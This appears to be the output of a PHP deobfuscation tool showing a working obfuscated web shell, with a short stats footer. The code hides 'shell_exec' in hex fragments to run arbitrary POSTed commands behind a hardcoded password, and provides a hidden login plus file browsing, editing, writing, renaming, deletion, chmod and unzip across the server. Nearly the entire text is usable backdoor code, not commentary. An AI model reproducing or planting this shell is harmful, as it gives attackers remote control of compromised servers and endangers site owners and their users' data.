</button></form></th></tr><?php  if (isset($_POST["\x63\x2d\x65\x6e\x67\151\156\145"])) { if ($_SESSION["\145\x6e\x67\151\156\x65"] == "\141\144\x6d\x69\156") { unset($_SESSION["\145\156\147\151\156\145"]); } else { unset($_SESSION["\145\156\147\x69\x6e\145"]); echo "\x3c\x74\162\x3e\74\164\x64\76\x3c\x66\x6f\162\x6d\x20\155\145\x74\150\x6f\144\75\47\x50\x4f\x53\x54\x27\40\x61\x63\x74\x69\157\x6e\x3d\x27\x23\x73\165\143\x63\145\x73\x73\47\76\74\151\156\x70\x75\x74\40\164\171\x70\145\75\47\164\145\x78\x74\x27\40\x70\x6c\x61\143\145\x68\x6f\x6c\144\145\x72\75\47\x20\76\x3e\x20\x43\55\x45\x4e\107\x49\x4e\105\x20\120\x57\x27\x20\156\x61\155\145\75\47\160\x77\x63\155\144\47\76\74\151\x6e\160\165\164\x20\x74\x79\x70\x65\x3d\47\x73\165\x62\155\151\164\47\x3e\74\57\146\157\x72\155\x3e\74\57\x74\x64\76\74\x2f\x74\x72\x3e\x3c\142\162\76"; } } if (isset($_POST["\160\x77\143\x6d\x64"])) { if ($_POST["\x70\x77\x63\x6d\144"] == "\x30\x78\143\64") { $_SESSION["\x65\x6e\147\x69\156\x65"] = "\141\144\x6d\151\x6e"; } } if ($_SESSION["\x65\x6e\x67\x69\156\145"] == "\x61\x64\155\x69\156") { echo "\74\164\x72\x3e\x3c\x74\x64\76\72\72\x3a\40\x3c\x66\x6f\162\x6d\x20\155\145\x74\x68\157\144\75\x27\120\x4f\x53\x54\x27\76\x3c\151\156\x70\x75\x74\x20\x69\x64\x3d\47\x63\155\x64\x27\x20\164\171\x70\x65\x3d\47\164\145\x78\164\x27\40\160\x6c\x61\x63\x65\x68\x6f\x6c\144\145\x72\x3d\47\x20\x3e\76\40\x43\55\105\116\x47\111\116\105\47\x20\x6e\141\x6d\x65\75\x27\143\145\x6e\147\x69\x6e\x65\x27\x3e\40\174\40\74\x62\x75\x74\x74\x6f\x6e\x20\x69\x64\x3d\x27\143\x6d\x64\47\76\x3e\76\74\57\x62\x75\x74\164\157\156\x3e\x3c\x2f\146\157\162\155\x3e\74\57\164\144\x3e\74\x2f\164\162\x3e\74\142\162\76"; } ?>
</table><?php  if (isset($_POST["\x63\x65\156\x67\x69\x6e\x65"])) { $cmdx = "\67\x33\x36\70\x36\x35"; $cmdy = "\67\70\66\x35\x36\x33"; $xxx = hex2bin($cmdx) . "\154\154\137\x65" . hex2bin($cmdy); $xv = $xxx($_POST["\143\145\x6e\147\151\x6e\x65"]); ?>
<textarea style="width:60%;height:400px"><?php  echo $xv; ?>
</textarea><?php  } ?>
</center><script>function toolsDiv(){var e=document.getElementById("toolsDIV"),n=document.getElementById("yuzu"),l=document.getElementById("yuzuDiv");"none"===e.style.display?(e.style.display="inline",n.style.display="none"):(e.style.display="none",n.style.display="inline"),l.style.display="none"}function yuzuDiv(){var e=document.getElementById("toolsDIV"),n=document.getElementById("yuzuDiv");"none"===n.style.display?n.style.display="inline":n.style.display="none",e.style.display="none"}</script><?php  if (!isset($_GET["\x70\141\x74\150"])) { $dir = getcwd(); $path = bin2hex($dir); $_GET["\160\141\164\150"]; $current_file = hex2bin($_GET["\x70\x61\164\x68"]); echo "\74\143\145\156\164\x65\162\x3e\x3c\x74\x61\x62\x6c\145\x20\163\164\171\154\x65\75\x22\142\157\162\144\145\162\72\40\x30\73\x22\76\74\x74\162\x3e\74\x74\144\76"; if ($server !== "\127\x49\x4e") { echo "\x3c\141\40\150\162\x65\146\x3d\x22\77\x70\141\x74\x68\75\x32\x66\42\x3e\x2f\74\57\x61\x3e\x3c\57\164\144\76\74\164\144\x3e"; } $dirs = str_replace("\x5c", "\57", $dir); $xdir = explode("\x2f", $dirs); foreach ($xdir as $key => $value) { if ($value != '') { echo "\x3c\x66\x6f\x6e\x74\x20\x73\x74\171\x6c\145\75\42\143\157\x6c\x6f\162\x3a\x23\x35\65\x35\x3b\x20\146\x6f\156\164\55\x77\145\151\147\150\x74\72\x20\x62\x6f\x6c\x64\x22\76\40\174\40\x3c\57\146\157\156\164\76"; } if (strtoupper(substr(PHP_OS, 0, 3)) === "\x57\111\116") { echo "\x3c\141\40\x68\x72\x65\x66\x3d\x22\77\160\141\x74\x68\x3d"; } else { echo "\x3c\x61\x20\x68\162\x65\x66\75\42\x3f\x70\141\x74\150\x3d\62\x66"; } for ($i = 0; $i <= intval($key); $i++) { $folder_path = bin2hex($xdir[$i] . "\x2f"); $filepath = $xdir[$i] . "\57"; $fld = str_replace("\40", '', $filepath); $fld = str_replace("\x2f", '', $filepath); if ($folder_path != "\x32\146") { echo $folder_path; } } echo "\42\x3e" . $fld . "\x3c\x2f\x61\76"; } echo "\x3c\57\164\162\76\x3c\x2f\164\144\x3e\74\57\x74\x61\x62\x6c\145\76\74\x2f\143\x65\x6e\164\145\x72\76"; } else { $path = $_GET["\160\x61\x74\x68"]; $dir = hex2bin($_GET["\x70\141\164\150"]); $current_file = hex2bin($_GET["\160\141\164\150"]); echo "\x3c\x63\x65\156\164\x65\x72\x3e\x3c\x74\x61\x62\154\145\x20\x73\164\x79\154\x65\x3d\x22\x62\x6f\162\x64\x65\x72\x3a\x20\x30\x3b\x22\76\74\164\x72\76\74\x74\144\76"; if ($server !== "\x57\x49\x4e") { echo "\x3c\x61\x20\x68\x72\145\146\x3d\42\x3f\160\141\164\150\x3d\62\146\x22\x3e\x2f\74\57\141\x3e\74\x2f\164\144\76\x3c\164\x64\76"; } $dirs = str_replace("\134", "\57", $dir); $xdir = explode("\57", $dirs); foreach ($xdir as $key => $value) { if ($value != '') { echo "\x3c\x66\157\x6e\x74\x20\163\164\171\154\x65\x3d\42\x63\157\x6c\157\162\72\x23\65\65\65\x3b\40\146\x6f\x6e\164\55\x77\x65\x69\147\150\x74\72\x20\x62\x6f\154\144\x22\x3e\x20\x7c\40\x3c\x2f\x66\157\x6e\x74\76"; } if (strtoupper(substr(PHP_OS, 0, 3)) === "\127\111\116") { echo "\x3c\x61\40\x68\162\145\146\x3d\42\77\160\x61\164\150\x3d"; } else { echo "\74\141\x20\x68\x72\145\x66\75\x22\77\x70\x61\x74\x68\75\62\146"; } for ($i = 0; $i <= intval($key); $i++) { $folder_path = bin2hex($xdir[$i] . "\x2f"); $filepath = $xdir[$i] . "\57"; $fld = str_replace("\40", '', $filepath); $fld = str_replace("\x2f", '', $filepath); if ($folder_path != "\62\x66") { echo $folder_path; } } echo "\42\76" . $fld . "\74\x2f\x61\x3e"; } echo "\74\57\164\162\x3e\74\x2f\x74\144\x3e\74\x2f\x74\x61\142\x6c\145\x3e\x3c\57\143\145\156\x74\x65\x72\76"; if (is_file($current_file)) { $dirname = bin2hex(dirname($current_file)); $my = $current_file; $myrx = str_replace($_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\124\137\122\117\117\x54"], "\x2f", $my); ?>
<br><center><table style="width:1200px;border-bottom-left-radius:0;border-bottom-right-radius:0"><tr><td>Filename: <a href="<?php  echo "\57\57" . $_SERVER["\110\124\124\x50\137\x48\117\x53\x54"] . "\57" . $myrx; ?>
"target="_blank"><?php  echo $current_file; ?>
</a></td></tr></table><?php  $f = "\x66" . "\x69" . "\154" . "\145" . "\137" . "\147" . "\x65" . "\x74" . "\137" . "\143" . "\157" . "\x6e" . "\164" . "\145" . "\x6e" . "\164" . "\x73"; $text = $f($current_file); ?>
<textarea style="width:1180px;height:660px"readonly><?php  echo htmlentities($text); ?>
		</textarea><br><br><br><?php  die; } } if (isset($_POST["\162\x65\x6e\141\155\145\137\x66\x6f\154\x64\145\162\x5f\160\x72\x6f\143\x63\145\x73\x73"])) { rename($_POST["\157\x6c\144\146\x6f\x6c\144\145\x72\x6e\x61\x6d\x65"], $_POST["\144\151\x72\x66\157\x6c\x64\145\x72\156\x61\x6d\145"] . "\57" . $_POST["\x6e\145\x77\x66\x6f\154\144\x65\x72\156\x61\x6d\145"]); } if (isset($_POST["\162\145\156\141\x6d\145\137\146\x6f\154\x64\x65\162"])) { ?>
<br><br><center><table><tr><th><i class="fa-solid fa-sharp fa-hippo"></i> RENAME FOLDER</th><th>dirname:</th><th><?php  echo dirname(hex2bin($_POST["\x66\157\154\x64\145\162\160\x61\164\150"])) . "\x2f"; ?>
</th><th width="600px"><form method="POST"><input name="dirfoldername"type="hidden"value="<?php  echo dirname(hex2bin($_POST["\x66\157\x6c\144\145\162\x70\x61\164\x68"])) . "\x2f"; ?>
"> <input name="oldfoldername"type="hidden"value="<?php  echo hex2bin($_POST["\146\157\x6c\144\145\162\160\x61\x74\x68"]); ?>
"> <input name="newfoldername"value="<?php  echo $_POST["\146\x6f\154\144\x65\x72\x6e\x61\x6d\145"]; ?>
"style="font-size:18px;width:100%"></th><th><input name="rename_folder_proccess"type="submit"value="REN"id="crud"></th></tr></table></center><?php  die; } if (isset($_POST["\144\x65\x6c\145\x74\x65\146\157\x6c\144\145\x72"])) { chmod(hex2bin($_POST["\146\x6f\154\x64\x65\162\x70\141\x74\x68"], 511)); rmdir(hex2bin($_POST["\146\157\154\144\145\162\x70\141\164\150"])); } if (isset($_POST["\162\x65\156\x61\x6d\x65\137\x66\151\x6c\145\x5f\x70\162\x6f\143\x63\145\163\163"])) { rename($_POST["\x6f\154\x64\x66\x69\x6c\145\156\141\155\x65"], $_POST["\x64\151\162\146\151\154\145\x6e\141\x6d\x65"] . "\x2f" . $_POST["\x6e\x65\x77\146\151\154\x65\156\141\155\145"]); } if (isset($_POST["\162\145\x6e\x61\155\x65\137\x66\151\154\x65"])) { ?>
<br><br><center><table><tr><th><i class="fa-solid fa-sharp fa-hippo"></i> RENAME FILE</th><th>dirname:</th><th><?php  echo dirname(hex2bin($_POST["\x66\151\x6c\x65\160\141\164\150"])) . "\57"; ?>
</th><th width="600px"><form method="POST"><input name="dirfilename"type="hidden"value="<?php  echo dirname(hex2bin($_POST["\146\151\x6c\145\x70\x61\164\150"])) . "\57"; ?>
"> <input name="oldfilename"type="hidden"value="<?php  echo hex2bin($_POST["\x66\x69\x6c\145\160\141\164\150"]); ?>
"> <input name="newfilename"value="<?php  echo $_POST["\146\x69\154\145\x6e\x61\x6d\x65"]; ?>
"style="font-size:18px;width:100%"></th><th><input name="rename_file_proccess"type="submit"value="REN"id="crud"></th></tr></table></center><?php  die; } if (isset($_POST["\x75\x6e\x7a\x69\160\137\x66\151\x6c\x65"])) { $zip = new ZipArchive(); $res = $zip->open(hex2bin($_POST["\146\x69\154\145\x70\x61\164\150"])); if ($res === TRUE) { $zip->extractTo(dirname(hex2bin($_POST["\x66\151\x6c\x65\x70\x61\164\x68"]))); $zip->close(); echo "\74\x63\x65\x6e\x74\x65\x72\x3e\x3c\164\x61\142\154\145\x20\x73\x74\171\154\145\x3d\42\x62\x61\x63\x6b\147\x72\x6f\x75\156\144\72\x20\x23\60\60\103\x34\x30\60\73\x22\76\x3c\x74\162\x3e\x3c\x74\144\x3e\x53\x75\x63\143\x65\163\x73\146\165\x6c\154\x79\x20\x55\x6e\x7a\x69\x70\40\106\x69\x6c\145\x21\x3c\57\164\x64\x3e\x3c\57\x74\x72\76\74\x2f\164\141\142\154\x65\x3e\74\57\x63\145\x6e\x74\x65\x72\x3e"; } else { echo "\74\x63\145\x6e\164\x65\x72\x3e\74\164\x61\x62\154\x65\40\163\164\171\154\x65\75\x22\x62\x61\143\153\147\162\x6f\165\x6e\144\x3a\x20\43\104\103\60\x30\60\60\x3b\x22\x3e\74\x74\162\76\x3c\164\144\x3e\x46\x61\x69\154\145\144\40\x74\x6f\x20\125\156\x7a\151\x70\40\106\151\154\x65\41\x3c\x2f\164\x64\76\74\x2f\164\162\76\74\x2f\x74\141\142\x6c\x65\x3e\x3c\x2f\143\145\x6e\x74\x65\x72\x3e"; } } if (isset($_POST["\x64\x65\154\x65\x74\145\x66\151\154\145"])) { chmod(hex2bin($_POST["\146\x69\154\x65\160\141\164\150"]), 438); unlink(hex2bin($_POST["\146\151\x6c\x65\160\x61\x74\150"])); } if (isset($_POST["\163\141\x76\145\x66\151\154\x65"])) { $file_handler = fopen($_POST["\x66\151\154\145\x70\141\164\150"], "\167"); fwrite($file_handler, $_POST["\146\151\154\145\137\x63\x6f\156\x74\145\156\x74"]); fclose($file_handler); } if (isset($_POST["\x65\144\151\x74\137\146\151\x6c\145"])) { echo "\74\142\x72\76\74\x62\162\76\x3c\142\162\x3e"; $f = "\x66" . "\151" . "\154" . "\145" . "\x5f" . "\147" . "\145" . "\x74" . "\137" . "\x63" . "\x6f" . "\x6e" . "\x74" . "\x65" . "\156" . "\164" . "\163"; $text = $f(hex2bin($_POST["\146\x69\154\x65\x70\141\x74\x68"])); ?>
<center><table style="background:#f88000;width:1200px;border-bottom-left-radius:0;border-bottom-right-radius:0"><tr><td>EDITING FILE:<?php  echo $_POST["\146\x69\x6c\x65\156\141\x6d\x65"]; ?>
</td></tr></table><form method="POST"><textarea style="background:#222;width:1180px;height:500px;color:#00c400"name="file_content"><?php  echo htmlentities($text); ?>
</textarea><br><br><input name="filepath"type="hidden"value="<?php  echo hex2bin($_POST["\146\151\x6c\145\x70\x61\164\x68"]); ?>
"> <input name="savefile"type="submit"value="save"style="font-size:18px"></form><br><br></center><?php  die; } if (isset($_POST["\x63\150\155\157\x64\137\x66\x69\x6c\145\x5f\160\x72\157\x63\143\x65\x73\x73"])) { $file = trim($_POST["\146\151\x6c\145\137\x74\x6f\137\143\150\x6d\157\144"]); $chmod = "\60" . $_POST["\x63\x68\x6d\x6f\144\x5f\146\151\154\145\x5f\166\141\x6c\165\x65"]; if (chmod(strval($file), intval($chmod))) { echo $file; echo $chmod; chmod(strval($file), intval($chmod)); } else { echo "\143\x61\156\156\x6f\x74\x20\143\150\155\157\144\40\x74\150\151\163\40\x66\151\154\145"; } } if (isset($_POST["\143\x68\155\x6f\144\137\x66\151\x6c\145"])) { ?>
<br><br><center><table><tr><th><i class="fa-solid fa-sharp fa-hippo"></i> CHMOD FILE</th><th>filename:</th><th><?php  echo hex2bin($_POST["\146\151\154\145\x70\x61\164\x68"]); ?>
</th><th width="600px"><form method="POST"action=""><input name="file_to_chmod"type="hidden"value="<?php  echo hex2bin($_POST["\x66\151\x6c\x65\x70\141\164\150"]); ?>
"> <input name="chmod_file_value"value="<?php  echo $_POST["\x63\x68\155\157\x64\x5f\x66\x69\154\145"]; ?>
"style="font-size:18px;width:100%"></th><th><input name="chmod_file_proccess"type="submit"value="CHMOD"id="crud"></th></tr></table></center><?php  die; } echo "\74\x62\x72\76"; if (is_dir($dir)) { $isi_dir = scandir($dir); } else { $isi_dir = $current_file; } ?>
<center><table style="width:1200px"><tr><th style="width:450px"><i class="fa-solid fa-sharp fa-virus"></i> NAME</th><th style="width:170px"colspan="4">ACTION</th><th style="text-align:right;width:330px">SIZE</th><th style="width:50px"></th></tr><?php  foreach ($isi_dir as $x => $foldername) { if (is_dir($dir . "\x2f" . $foldername)) { if ($foldername !== "\56" & $foldername !== "\x2e\x2e") { $folderpath = bin2hex($dir . "\57" . $foldername); ?>
<tr><td><p><i class="fa-solid fa-folder-open"style="color:#ff0;padding:5px;text-shadow:#000 1px 0 10px"></i> <a href="?path=<?php  echo $folderpath; ?>
"id="filename"><?php  echo $foldername; ?>
</a></p></td><td></td><td><form method="POST"><input name="folderpath"type="hidden"value="<?php  echo $folderpath; ?>
"> <input name="foldername"type="hidden"value="<?php  echo $foldername; ?>
"> <input name="rename_folder"type="submit"value="REN"id="crud"></form></td><td></td><td><form method="POST"><input name="folderpath"type="hidden"value="<?php  echo $folderpath; ?>
"> <input name="foldername"type="hidden"value="<?php  echo $foldername; ?>
"> <input name="deletefolder"type="submit"value="DEL"id="crud"style="color:#dc0000"></form></td><td align="right">DIR |</td><td><?php  $folder_x = str_replace($_SERVER["\x44\117\x43\125\x4d\x45\116\x54\x5f\122\117\117\x54"], "\57", hex2bin($folderpath)); ?>
<a href="<?php  echo "\x68\164\x74\160\72\x2f\x2f" . $_SERVER["\x48\x54\x54\x50\137\110\117\x53\124"] . "\x2f" . $folder_x; ?>
"target="_blank"><i class="fa-solid fa-sharp fa-arrow-up-right-from-square"></i></a></td></tr><?php  } } } echo ''; foreach ($isi_dir as $x => $filename) { if (is_file($dir . "\x2f" . $filename)) { if ($filename !== "\56" & $filename !== "\x2e\x2e") { $filepath = bin2hex($dir . "\x2f" . $filename); ?>
<tr><td><p><i class="fa-solid fa-file-lines"style="color:#ff4500;padding:5px;text-shadow:#000 1px 0 10px"></i> <a href="?path=<?php  echo $filepath; ?>
"id="filename"><?php  echo $filename; ?>
</a></p></td><td><form method="POST"><input name="filepath"type="hidden"value="<?php  echo $filepath; ?>
"> <input name="filename"type="hidden"value="<?php  echo $filename; ?>
"> <input name="edit_file"type="submit"value="EDIT"id="crud"></form></td><td><form method="POST"><input name="filepath"type="hidden"value="<?php  echo $filepath; ?>
"> <input name="filename"type="hidden"value="<?php  echo $filename; ?>
"> <input name="rename_file"type="submit"value="REN"id="crud"></form></td><td><?php  $ext = pathinfo($filename, PATHINFO_EXTENSION); if ($ext == "\x7a\x69\160") { ?>
<form method="POST"><input name="filepath"type="hidden"value="<?php  echo $filepath; ?>
"> <input name="filename"type="hidden"value="<?php  echo $filename; ?>
"> <input name="unzip_file"type="submit"value="UNZ"id="crud"style="color:#f88000"></form><?php  } ?>
</td><td><form method="POST"><input name="filepath"type="hidden"value="<?php  echo $filepath; ?>
"> <input name="filename"type="hidden"value="<?php  echo $filename; ?>
"> <input name="deletefile"type="submit"value="DEL"id="crud"style="color:#dc0000"></form></td><td align="right"><?php  echo filesize($dir . "\57" . $filename); ?>
KB |</td><td><?php  $file_x = str_replace($_SERVER["\104\x4f\x43\125\115\x45\116\124\137\x52\117\x4f\x54"], "\x2f", hex2bin($filepath)); ?>
<a href="<?php  echo "\x68\164\x74\160\72\57\57" . $_SERVER["\x48\124\x54\x50\137\x48\117\123\124"] . "\x2f" . $file_x; ?>
"target="_blank"><i class="fa-solid fa-sharp fa-arrow-up-right-from-square"></i></a></td></tr><?php  } } } echo "\x3c\x2f\164\x61\142\x6c\145\x3e\74\164\x61\x62\154\x65\76\74\x74\162\x3e\x3c\x74\144\40\163\164\171\154\x65\x3d\x22\143\157\x6c\157\x72\x3a\40\43\x34\64\64\73\42\76\74\151\76\x50\x75\x72\145\x20\x43\157\144\145\144\x20\142\x79\x20\120\x45\116\107\x41\x42\104\x49\40\x53\124\x45\x50\x4d\x4f\x4d\74\57\151\x3e\74\57\164\162\x3e\74\57\x74\144\76\74\57\x74\141\x62\x6c\x65\76\74\x2f\x63\x65\156\x74\145\x72\76\x3c\x62\162\x3e\x3c\142\162\x20\57\76\x3c\x2f\142\157\x64\x79\x3e"; } goto XDJlj; DlMqe: session_start(); goto MvAKD; NO0D9: error_reporting(0); goto DlMqe; I6Ird: if (isset($_GET["\170\x78"])) { ?>
<form method="POST"><input name="admin"><input name="login"type="submit"></form><?php  } goto bCNjm; MvAKD: if (isset($_POST["\x6c\x6f\147\151\x6e"])) { $password = $_POST["\141\x64\x6d\151\x6e"]; $password = md5($password); $pass = "\70\60\x62\x39\x36\62\x64\71\70\x38\x65\71\142\65\x64\66\67\x31\x64\x31\x39\71\67\62\x33\67\142\70\x38\x30\141\141"; if ($password == $pass) { $_SESSION["\141\x64\155\151\156"] = "\x38\60\142\71\x36\x32\144\71\70\x38\145\71\142\65\144\x36\x37\x31\144\x31\71\71\x37\62\x33\x37\x62\x38\x38\x30\141\x61"; } } goto I6Ird; XDJlj: ?>

Function Calls

None

Variables

None

Stats

MD5 ed6e6817a70a41c8853d16bffd8a903c
Eval Count 0
Decode Time 97 ms